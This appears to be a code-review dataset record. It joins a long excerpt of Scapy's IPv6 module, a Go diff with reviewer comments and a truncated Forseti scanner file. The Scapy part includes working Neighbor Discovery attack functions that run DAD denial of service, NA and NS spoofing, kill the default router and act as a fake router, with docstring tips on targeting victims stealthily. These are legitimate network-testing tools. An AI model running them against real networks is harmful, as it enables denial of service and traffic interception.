i2repr(self, pkt, x): return "%d sec" % (4 * x) class MIP6MH_BU(_MobilityHeader): name = "IPv6 Mobility Header - Binding Update" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 
8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 5, mhtypes), ByteField("res", None), XShortField("cksum", None), XShortField("seq", None), # TODO: ShortNonceField FlagsField("flags", "KHA", 7, "PRMKLHA"), XBitField("reserved", 0, 9), LifetimeField("mhtime", 3), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if isinstance(other, MIP6MH_BRR): return 1 return 0 class MIP6MH_BA(_MobilityHeader): name = "IPv6 Mobility Header - Binding ACK" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes (excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 6, mhtypes), ByteField("res", None), XShortField("cksum", None), ByteEnumField("status", 0, bastatus), FlagsField("flags", "K", 3, "PRK"), XBitField("res2", None, 5), XShortField("seq", None), # TODO: ShortNonceField XShortField("mhtime", 0), # unit == 4 seconds _PhantomAutoPadField("autopad", 1), # autopad activated by default # noqa: E501 _OptionsField("options", [], MIP6OptUnknown, 12, length_from=lambda pkt: 8 * pkt.len - 4)] overload_fields = {IPv6: {"nh": 135}} def hashret(self): # Hack: see comment in MIP6MH_BRR.hashret() return b"\x00\x08\x09" def answers(self, other): if (isinstance(other, MIP6MH_BU) and other.mhtype == 5 and self.mhtype == 6 and other.flags & 0x1 and # Ack request flags is set self.seq == other.seq): return 1 return 0 _bestatus = {1: 'Unknown binding for Home Address destination option', 2: 'Unrecognized MH Type value'} # TODO: match Binding Error to its stimulus class MIP6MH_BE(_MobilityHeader): name = "IPv6 Mobility Header - Binding Error" fields_desc = [ByteEnumField("nh", 59, ipv6nh), ByteField("len", None), # unit == 8 bytes 
(excluding the first 8 bytes) # noqa: E501 ByteEnumField("mhtype", 7, mhtypes), ByteField("res", 0), XShortField("cksum", None), ByteEnumField("status", 0, _bestatus), ByteField("reserved", 0), IP6Field("ha", "::"), _OptionsField("options", [], MIP6OptUnknown, 24, length_from=lambda pkt: 8 * (pkt.len - 2))] overload_fields = {IPv6: {"nh": 135}} _mip6_mhtype2cls = {0: MIP6MH_BRR, 1: MIP6MH_HoTI, 2: MIP6MH_CoTI, 3: MIP6MH_HoT, 4: MIP6MH_CoT, 5: MIP6MH_BU, 6: MIP6MH_BA, 7: MIP6MH_BE} ############################################################################# ############################################################################# # Traceroute6 # ############################################################################# ############################################################################# class AS_resolver6(AS_resolver_riswhois): def _resolve_one(self, ip): """ overloaded version to provide a Whois resolution on the embedded IPv4 address if the address is 6to4 or Teredo. Otherwise, the native IPv6 address is passed. """ if in6_isaddr6to4(ip): # for 6to4, use embedded @ tmp = inet_pton(socket.AF_INET6, ip) addr = inet_ntop(socket.AF_INET, tmp[2:6]) elif in6_isaddrTeredo(ip): # for Teredo, use mapped address addr = teredoAddrExtractInfo(ip)[2] else: addr = ip _, asn, desc = AS_resolver_riswhois._resolve_one(self, addr) if asn.startswith("AS"): try: asn = int(asn[2:]) except ValueError: pass return ip, asn, desc class TracerouteResult6(TracerouteResult): __slots__ = [] def show(self): return self.make_table(lambda s, r: (s.sprintf("%-42s,IPv6.dst%:{TCP:tcp%TCP.dport%}{UDP:udp%UDP.dport%}{ICMPv6EchoRequest:IER}"), # TODO: ICMPv6 ! 
# noqa: E501 s.hlim, r.sprintf("%-42s,IPv6.src% {TCP:%TCP.flags%}" + # noqa: E501 "{ICMPv6DestUnreach:%ir,type%}{ICMPv6PacketTooBig:%ir,type%}" + # noqa: E501 "{ICMPv6TimeExceeded:%ir,type%}{ICMPv6ParamProblem:%ir,type%}" + # noqa: E501 "{ICMPv6EchoReply:%ir,type%}"))) # noqa: E501 def get_trace(self): trace = {} for s, r in self.res: if IPv6 not in s: continue d = s[IPv6].dst if d not in trace: trace[d] = {} t = not (ICMPv6TimeExceeded in r or ICMPv6DestUnreach in r or ICMPv6PacketTooBig in r or ICMPv6ParamProblem in r) trace[d][s[IPv6].hlim] = r[IPv6].src, t for k in six.itervalues(trace): try: m = min(x for x, y in six.iteritems(k) if y[1]) except ValueError: continue for li in list(k): # use list(): k is modified in the loop if li > m: del k[li] return trace def graph(self, ASres=AS_resolver6(), **kargs): TracerouteResult.graph(self, ASres=ASres, **kargs) @conf.commands.register def traceroute6(target, dport=80, minttl=1, maxttl=30, sport=RandShort(), l4=None, timeout=2, verbose=None, **kargs): """Instant TCP traceroute using IPv6 traceroute6(target, [maxttl=30], [dport=80], [sport=80]) -> None """ if verbose is None: verbose = conf.verb if l4 is None: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / TCP(seq=RandInt(), sport=sport, dport=dport), # noqa: E501 timeout=timeout, filter="icmp6 or tcp", verbose=verbose, **kargs) # noqa: E501 else: a, b = sr(IPv6(dst=target, hlim=(minttl, maxttl)) / l4, timeout=timeout, verbose=verbose, **kargs) a = TracerouteResult6(a.res) if verbose: a.display() return a, b ############################################################################# ############################################################################# # Sockets # ############################################################################# ############################################################################# class L3RawSocket6(L3RawSocket): def __init__(self, type=ETH_P_IPV6, filter=None, iface=None, promisc=None, nofilter=0): # noqa: E501 
L3RawSocket.__init__(self, type, filter, iface, promisc) # NOTE: if fragmentation is needed, it will be done by the kernel (RFC 2292) # noqa: E501 self.outs = socket.socket(socket.AF_INET6, socket.SOCK_RAW, socket.IPPROTO_RAW) # noqa: E501 self.ins = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(type)) # noqa: E501 def IPv6inIP(dst='203.178.135.36', src=None): _IPv6inIP.dst = dst _IPv6inIP.src = src if not conf.L3socket == _IPv6inIP: _IPv6inIP.cls = conf.L3socket else: del(conf.L3socket) return _IPv6inIP class _IPv6inIP(SuperSocket): dst = '127.0.0.1' src = None cls = None def __init__(self, family=socket.AF_INET6, type=socket.SOCK_STREAM, proto=0, **args): # noqa: E501 SuperSocket.__init__(self, family, type, proto) self.worker = self.cls(**args) def set(self, dst, src=None): _IPv6inIP.src = src _IPv6inIP.dst = dst def nonblock_recv(self): p = self.worker.nonblock_recv() return self._recv(p) def recv(self, x): p = self.worker.recv(x) return self._recv(p, x) def _recv(self, p, x=MTU): if p is None: return p elif isinstance(p, IP): # TODO: verify checksum if p.src == self.dst and p.proto == socket.IPPROTO_IPV6: if isinstance(p.payload, IPv6): return p.payload return p def send(self, x): return self.worker.send(IP(dst=self.dst, src=self.src, proto=socket.IPPROTO_IPV6) / x) # noqa: E501 ############################################################################# ############################################################################# # Neighbor Discovery Protocol Attacks # ############################################################################# ############################################################################# def _NDP_Attack_DAD_DoS(reply_callback, iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Internal generic helper accepting a specific callback as first argument, for NS or NA reply. See the two specific functions below. 
""" def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 # Get and compare the MAC address mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must be the unspecified address if req[IPv6].src != "::": return 0 # Check destination is the link-local solicited-node multicast # address associated with target address in received NS tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 received_snma = inet_pton(socket.AF_INET6, req[IPv6].dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: return 0 return 1 if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, iface), iface=iface) def NDP_Attack_DAD_DoS_via_NS(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages sent from the unspecified address and sending a NS reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NS sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the unspecified address (::). - as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. 
Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. """ def ns_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS by sending a similar NS """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src="::", dst=dst) / ICMPv6ND_NS(tgt=tgt) # noqa: E501 sendp(rep, iface=iface, verbose=0) print("Reply NS for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(ns_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_DAD_DoS_via_NA(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None): """ Perform the DAD DoS attack using NS described in section 4.1.3 of RFC 3756. This is done by listening incoming NS messages *sent from the unspecified address* and sending a NA reply for the target address, leading the peer to believe that another node is also performing DAD for that address. By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address found in received NS. 
- as IPv6 destination address: the link-local solicited-node multicast address derived from the target address in received NS. - the mac address of the interface as source (or reply_mac, see below). - the multicast mac address derived from the solicited node multicast address used as IPv6 destination address. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. 
""" def na_reply_callback(req, reply_mac, iface): """ Callback that reply to a NS with a NA """ # Let's build a reply and send it mac = req[Ether].src dst = req[IPv6].dst tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac) / IPv6(src=tgt, dst=dst) rep /= ICMPv6ND_NA(tgt=tgt, S=0, R=0, O=1) # noqa: E741 rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) _NDP_Attack_DAD_DoS(na_reply_callback, iface, mac_src_filter, tgt_filter, reply_mac) def NDP_Attack_NA_Spoofing(iface=None, mac_src_filter=None, tgt_filter=None, reply_mac=None, router=False): """ The main purpose of this function is to send fake Neighbor Advertisement messages to a victim. As the emission of unsolicited Neighbor Advertisement is pretty pointless (from an attacker standpoint) because it will not lead to a modification of a victim's neighbor cache, the function send advertisements in response to received NS (NS sent as part of the DAD, i.e. with an unspecified address as source, are not considered). By default, the fake NA sent to create the DoS uses: - as target address the target address found in received NS. - as IPv6 source address: the target address - as IPv6 destination address: the source IPv6 address of received NS message. - the mac address of the interface as source (or reply_mac, see below). - the source mac address of the received NS as destination macs address of the emitted NA. - A Target Link-Layer address option (ICMPv6NDOptDstLLAddr) filled with the mac address used as source of the NA. Following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only NS messages received from this source will trigger replies. 
This allows limiting the effects of the DoS to a single target by filtering on its mac address. The default value is None: the DoS is not limited to a specific mac address. tgt_filter: Same as previous but for a specific target IPv6 address for received NS. If the target address in the NS message (not the IPv6 destination address) matches that address, then a fake reply will be sent, i.e. the emitter will be a target of the DoS. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. This address will also be used in the Target Link-Layer Address option. router: by the default (False) the 'R' flag in the NA used for the reply is not set. If the parameter is set to True, the 'R' flag in the NA is set, advertising us as a router. Please, keep the following in mind when using the function: for obvious reasons (kernel space vs. Python speed), when the target of the address resolution is on the link, the sender of the NS receives 2 NA messages in a row, the valid one and our fake one. The second one will overwrite the information provided by the first one, i.e. the natural latency of Scapy helps here. In practice, on a common Ethernet link, the emission of the NA from the genuine target (kernel stack) usually occurs in the same millisecond as the receipt of the NS. The NA generated by Scapy6 will usually come after something 20+ ms. On a usual testbed for instance, this difference is sufficient to have the first data packet sent from the victim to the destination before it even receives our fake NA. 
""" def is_request(req, mac_src_filter, tgt_filter): """ Check if packet req is a request """ # Those simple checks are based on Section 5.4.2 of RFC 4862 if not (Ether in req and IPv6 in req and ICMPv6ND_NS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 # Source must NOT be the unspecified address if req[IPv6].src == "::": return 0 tgt = inet_pton(socket.AF_INET6, req[ICMPv6ND_NS].tgt) if tgt_filter and tgt != tgt_filter: return 0 dst = req[IPv6].dst if in6_isllsnmaddr(dst): # Address is Link Layer Solicited Node mcast. # If this is a real address resolution NS, then the destination # address of the packet is the link-local solicited node multicast # address associated with the target of the NS. # Otherwise, the NS is a NUD related one, i.e. the peer is # unicasting the NS to check the target is still alive (L2 # information is still in its cache and it is verified) received_snma = inet_pton(socket.AF_INET6, dst) expected_snma = in6_getnsma(tgt) if received_snma != expected_snma: print("solicited node multicast @ does not match target @!") return 0 return 1 def reply_callback(req, reply_mac, router, iface): """ Callback that reply to a NS with a spoofed NA """ # Let's build a reply (as defined in Section 7.2.4. of RFC 4861) and # send it back. mac = req[Ether].src pkt = req[IPv6] src = pkt.src tgt = req[ICMPv6ND_NS].tgt rep = Ether(src=reply_mac, dst=mac) / IPv6(src=tgt, dst=src) # Use the target field from the NS rep /= ICMPv6ND_NA(tgt=tgt, S=1, R=router, O=1) # noqa: E741 # "If the solicitation IP Destination Address is not a multicast # address, the Target Link-Layer Address option MAY be omitted" # Given our purpose, we always include it. 
rep /= ICMPv6NDOptDstLLAddr(lladdr=reply_mac) sendp(rep, iface=iface, verbose=0) print("Reply NA for target address %s (received from %s)" % (tgt, mac)) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac router = (router and 1) or 0 # Value of the R flags in NA sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, tgt_filter), prn=lambda x: reply_callback(x, reply_mac, router, iface), iface=iface) def NDP_Attack_NS_Spoofing(src_lladdr=None, src=None, target="2001:db8::1", dst=None, src_mac=None, dst_mac=None, loop=True, inter=1, iface=None): """ The main purpose of this function is to send fake Neighbor Solicitations messages to a victim, in order to either create a new entry in its neighbor cache or update an existing one. In section 7.2.3 of RFC 4861, it is stated that a node SHOULD create the entry or update an existing one (if it is not currently performing DAD for the target of the NS). The entry's reachability # noqa: E501 state is set to STALE. The two main parameters of the function are the source link-layer address (carried by the Source Link-Layer Address option in the NS) and the source address of the packet. Unlike some other NDP_Attack_* function, this one is not based on a stimulus/response model. When called, it sends the same NS packet in loop every second (the default) Following arguments can be used to change the format of the packets: src_lladdr: the MAC address used in the Source Link-Layer Address option included in the NS packet. This is the address that the peer should associate in its neighbor cache with the IPv6 source address of the packet. If None is provided, the mac address of the interface is used. src: the IPv6 address used as source of the packet. If None is provided, an address associated with the emitting interface will be used (based on the destination address of the packet). 
target: the target address of the NS packet. If no value is provided, a dummy address (2001:db8::1) is used. The value of the target has a direct impact on the destination address of the packet if it is not overridden. By default, the solicited-node multicast address associated with the target is used as destination address of the packet. Consider specifying a specific destination address if you intend to use a target address different than the one of the victim. dst: The destination address of the NS. By default, the solicited node multicast address associated with the target address (see previous parameter) is used if no specific value is provided. The victim is not expected to check the destination address of the packet, so using a multicast address like ff02::1 should work if you want the attack to target all hosts on the link. On the contrary, if you want to be more stealth, you should provide the target address for this parameter in order for the packet to be sent only to the victim. src_mac: the MAC address used as source of the packet. By default, this is the address of the interface. If you want to be more stealth, feel free to use something else. Note that this address is not the that the victim will use to populate its neighbor cache. dst_mac: The MAC address used as destination address of the packet. If the IPv6 destination address is multicast (all-nodes, solicited node, ...), it will be computed. If the destination address is unicast, a neighbor solicitation will be performed to get the associated address. If you want the attack to be stealth, you can provide the MAC address using this parameter. loop: By default, this parameter is True, indicating that NS packets will be sent in loop, separated by 'inter' seconds (see below). When set to False, a single packet is sent. inter: When loop parameter is True (the default), this parameter provides the interval in seconds used for sending NS packets. iface: to force the sending interface. 
""" if not iface: iface = conf.iface # Use provided MAC address as source link-layer address option # or the MAC address of the interface if none is provided. if not src_lladdr: src_lladdr = get_if_hwaddr(iface) # Prepare packets parameters ether_params = {} if src_mac: ether_params["src"] = src_mac if dst_mac: ether_params["dst"] = dst_mac ipv6_params = {} if src: ipv6_params["src"] = src if dst: ipv6_params["dst"] = dst else: # Compute the solicited-node multicast address # associated with the target address. tmp = inet_ntop(socket.AF_INET6, in6_getnsma(inet_pton(socket.AF_INET6, target))) ipv6_params["dst"] = tmp pkt = Ether(**ether_params) pkt /= IPv6(**ipv6_params) pkt /= ICMPv6ND_NS(tgt=target) pkt /= ICMPv6NDOptSrcLLAddr(lladdr=src_lladdr) sendp(pkt, inter=inter, loop=loop, iface=iface, verbose=0) def NDP_Attack_Kill_Default_Router(iface=None, mac_src_filter=None, ip_src_filter=None, reply_mac=None, tgt_mac=None): """ The purpose of the function is to monitor incoming RA messages sent by default routers (RA with a non-zero Router Lifetime values) and invalidate them by immediately replying with fake RA messages advertising a zero Router Lifetime value. The result on receivers is that the router is immediately invalidated, i.e. the associated entry is discarded from the default router list and destination cache is updated to reflect the change. By default, the function considers all RA messages with a non-zero Router Lifetime value but provides configuration knobs to allow filtering RA sent by specific routers (Ethernet source address). With regard to emission, the multicast all-nodes address is used by default but a specific target can be used, in order for the DoS to apply only to a specific host. More precisely, following arguments can be used to change the behavior: iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If None is provided conf.iface is used. 
mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RA messages received from this source will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific mac address. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RA messages received from this source address will trigger replies. If other default routers advertised their presence on the link, their clients will not be impacted by the attack. The default value is None: the DoS is not limited to a specific IPv6 source address. reply_mac: allow specifying a specific source mac address for the reply, i.e. to prevent the use of the mac address of the interface. tgt_mac: allow limiting the effect of the DoS to a specific host, by sending the "invalidating RA" only to its mac address. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RA in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 # Check if this is an advertisement for a Default Router # by looking at Router Lifetime value if req[ICMPv6ND_RA].routerlifetime == 0: return 0 return 1 def ra_reply_callback(req, reply_mac, tgt_mac, iface): """ Callback that sends an RA with a 0 lifetime """ # Let's build a reply and send it src = req[IPv6].src # Prepare packets parameters ether_params = {} if reply_mac: ether_params["src"] = reply_mac if tgt_mac: ether_params["dst"] = tgt_mac # Basis of fake RA (high pref, zero lifetime) rep = Ether(**ether_params) / IPv6(src=src, dst="ff02::1") rep /= ICMPv6ND_RA(prf=1, routerlifetime=0) # Add it a PIO from the request ... 
tmp = req while ICMPv6NDOptPrefixInfo in tmp: pio = tmp[ICMPv6NDOptPrefixInfo] tmp = pio.payload del(pio.payload) rep /= pio # ... and source link layer address option if ICMPv6NDOptSrcLLAddr in req: mac = req[ICMPv6NDOptSrcLLAddr].lladdr else: mac = req[Ether].src rep /= ICMPv6NDOptSrcLLAddr(lladdr=mac) sendp(rep, iface=iface, verbose=0) print("Fake RA sent with source address %s" % src) if not iface: iface = conf.iface # To prevent sniffing our own traffic if not reply_mac: reply_mac = get_if_hwaddr(iface) sniff_filter = "icmp6 and not ether src %s" % reply_mac sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, reply_mac, tgt_mac, iface), iface=iface) def NDP_Attack_Fake_Router(ra, iface=None, mac_src_filter=None, ip_src_filter=None): """ The purpose of this function is to send provided RA message at layer 2 (i.e. providing a packet starting with IPv6 will not work) in response to received RS messages. In the end, the function is a simple wrapper around sendp() that monitor the link for RS messages. It is probably better explained with an example: >>> ra = Ether()/IPv6()/ICMPv6ND_RA() >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:1::", prefixlen=64) >>> ra /= ICMPv6NDOptPrefixInfo(prefix="2001:db8:2::", prefixlen=64) >>> ra /= ICMPv6NDOptSrcLLAddr(lladdr="00:11:22:33:44:55") >>> NDP_Attack_Fake_Router(ra, iface="eth0") Fake RA sent in response to RS from fe80::213:58ff:fe8c:b573 Fake RA sent in response to RS from fe80::213:72ff:fe8c:b9ae ... Following arguments can be used to change the behavior: ra: the RA message to send in response to received RS message. iface: a specific interface (e.g. "eth0") of the system on which the DoS should be launched. If none is provided, conf.iface is used. mac_src_filter: a mac address (e.g "00:13:72:8c:b5:69") to filter on. Only RS messages received from this source will trigger a reply. 
Note that no changes to provided RA is done which imply that if you intend to target only the source of the RS using this option, you will have to set the Ethernet destination address to the same value in your RA. The default value for this parameter is None: no filtering on the source of RS is done. ip_src_filter: an IPv6 address (e.g. fe80::21e:bff:fe4e:3b2) to filter on. Only RS messages received from this source address will trigger replies. Same comment as for previous argument apply: if you use the option, you will probably want to set a specific Ethernet destination address in the RA. """ def is_request(req, mac_src_filter, ip_src_filter): """ Check if packet req is a request """ if not (Ether in req and IPv6 in req and ICMPv6ND_RS in req): return 0 mac_src = req[Ether].src if mac_src_filter and mac_src != mac_src_filter: return 0 ip_src = req[IPv6].src if ip_src_filter and ip_src != ip_src_filter: return 0 return 1 def ra_reply_callback(req, iface): """ Callback that sends an RA in reply to an RS """ src = req[IPv6].src sendp(ra, iface=iface, verbose=0) print("Fake RA sent in response to RS from %s" % src) if not iface: iface = conf.iface sniff_filter = "icmp6" sniff(store=0, filter=sniff_filter, lfilter=lambda x: is_request(x, mac_src_filter, ip_src_filter), prn=lambda x: ra_reply_callback(x, iface), iface=iface) ############################################################################# # Pre-load classes ## ############################################################################# def _get_cls(name): return globals().get(name, Raw) def _load_dict(d): for k, v in d.items(): d[k] = _get_cls(v) _load_dict(icmp6ndoptscls) _load_dict(icmp6typescls) _load_dict(ipv6nhcls) ############################################################################# ############################################################################# # Layers binding # ############################################################################# 
############################################################################# conf.l3types.register(ETH_P_IPV6, IPv6) conf.l2types.register(31, IPv6) conf.l2types.register(DLT_IPV6, IPv6) conf.l2types.register(DLT_RAW, _IPv46) conf.l2types.register_num2layer(DLT_RAW_ALT, _IPv46) bind_layers(Ether, IPv6, type=0x86dd) bind_layers(CookedLinux, IPv6, proto=0x86dd) bind_layers(GRE, IPv6, proto=0x86dd) bind_layers(SNAP, IPv6, code=0x86dd) bind_layers(Loopback, IPv6, type=socket.AF_INET6) bind_layers(IPerror6, TCPerror, nh=socket.IPPROTO_TCP) bind_layers(IPerror6, UDPerror, nh=socket.IPPROTO_UDP) bind_layers(IPv6, TCP, nh=socket.IPPROTO_TCP) bind_layers(IPv6, UDP, nh=socket.IPPROTO_UDP) bind_layers(IP, IPv6, proto=socket.IPPROTO_IPV6) bind_layers(IPv6, IPv6, nh=socket.IPPROTO_IPV6) bind_layers(IPv6, IP, nh=socket.IPPROTO_IPIP) bind_layers(IPv6, GRE, nh=socket.IPPROTO_GRE)
1
18,539
Why are you changing this?
secdev-scapy
py
@@ -35,11 +35,11 @@ func NewConfigParser() *ConsumerConfigParser { } // Parse parses the given configuration -func (c *ConsumerConfigParser) Parse(config json.RawMessage) (ip string, port int, serviceType services.ServiceType, err error) { +func (c *ConsumerConfigParser) Parse(config *json.RawMessage) (ip string, port int, serviceType services.ServiceType, err error) { // TODO: since we are getting json.RawMessage here and not interface{} type not sure how to handle multiple services // since NATPinger is one for all services and we get config from communication channel where service type is not know yet. var cfg openvpn.ConsumerConfig - err = json.Unmarshal(config, &cfg) + err = json.Unmarshal(*config, &cfg) if err != nil { return "", 0, "", errors.Wrap(err, "parsing consumer address:port failed") }
1
/* * Copyright (C) 2019 The "MysteriumNetwork/node" Authors. * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see <http://www.gnu.org/licenses/>. */ package config import ( "encoding/json" "github.com/mysteriumnetwork/node/services" "github.com/mysteriumnetwork/node/services/openvpn" "github.com/pkg/errors" ) // ConsumerConfigParser parses consumer configs type ConsumerConfigParser struct { } // NewConfigParser returns a new ConsumerConfigParser func NewConfigParser() *ConsumerConfigParser { return &ConsumerConfigParser{} } // Parse parses the given configuration func (c *ConsumerConfigParser) Parse(config json.RawMessage) (ip string, port int, serviceType services.ServiceType, err error) { // TODO: since we are getting json.RawMessage here and not interface{} type not sure how to handle multiple services // since NATPinger is one for all services and we get config from communication channel where service type is not know yet. var cfg openvpn.ConsumerConfig err = json.Unmarshal(config, &cfg) if err != nil { return "", 0, "", errors.Wrap(err, "parsing consumer address:port failed") } if cfg.IP == nil { return "", 0, "", errors.New("remote party does not support NAT hole punching, IP:PORT is missing") } return *cfg.IP, cfg.Port, openvpn.ServiceType, nil }
1
14,283
`json.RawMessage` is a `[]byte`, which is already a pointer. Why do we need to have pointer here if we just reading this value?
mysteriumnetwork-node
go
@@ -29,7 +29,7 @@ func main() { cni.ActionAdd.Request, cni.ActionCheck.Request, cni.ActionDel.Request, - cni_version.PluginSupports("0.1.0", "0.2.0", "0.3.0", "0.3.1"), + cni_version.All, fmt.Sprintf("Antrea CNI %s", version.GetFullVersionWithRuntimeInfo()), ) }
1
// Copyright 2019 Antrea Authors // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. // See the License for the specific language governing permissions and // limitations under the License. package main import ( "fmt" "github.com/vmware-tanzu/antrea/pkg/cni" "github.com/vmware-tanzu/antrea/pkg/version" "github.com/containernetworking/cni/pkg/skel" cni_version "github.com/containernetworking/cni/pkg/version" ) func main() { skel.PluginMain( cni.ActionAdd.Request, cni.ActionCheck.Request, cni.ActionDel.Request, cni_version.PluginSupports("0.1.0", "0.2.0", "0.3.0", "0.3.1"), fmt.Sprintf("Antrea CNI %s", version.GetFullVersionWithRuntimeInfo()), ) }
1
18,636
should we actually switch to `All` or just add `0.4.0` explicitly to the list of supported CNI versions? What is a new CNI version is released?
antrea-io-antrea
go
@@ -23,6 +23,7 @@ from google.cloud.security.notifier import notifier from google.cloud.security.common.data_access import csv_writer from google.cloud.security.scanner.audit import fw_rules_engine +from google.cloud.security.common.gcp_type import resource_util from google.cloud.security.common.data_access import firewall_rule_dao from google.cloud.security.scanner.scanners import base_scanner
1
# Copyright 2017 The Forseti Security Authors. All rights reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Scanner for the firewall rule engine.""" from datetime import datetime import itertools import os import sys from google.cloud.security.common.util import log_util from google.cloud.security.notifier import notifier from google.cloud.security.common.data_access import csv_writer from google.cloud.security.scanner.audit import fw_rules_engine from google.cloud.security.common.data_access import firewall_rule_dao from google.cloud.security.scanner.scanners import base_scanner LOGGER = log_util.get_logger(__name__) class FwPolicyScanner(base_scanner.BaseScanner): """Scanner for firewall data.""" SCANNER_OUTPUT_CSV_FMT = 'scanner_output_fw.{}.csv' def __init__(self, global_configs, scanner_configs, snapshot_timestamp, rules): """Initialization. Args: global_configs (dict): Global configurations. scanner_configs (dict): Scanner configurations. snapshot_timestamp (str): Timestamp, formatted as YYYYMMDDTHHMMSSZ. rules (str): Fully-qualified path and 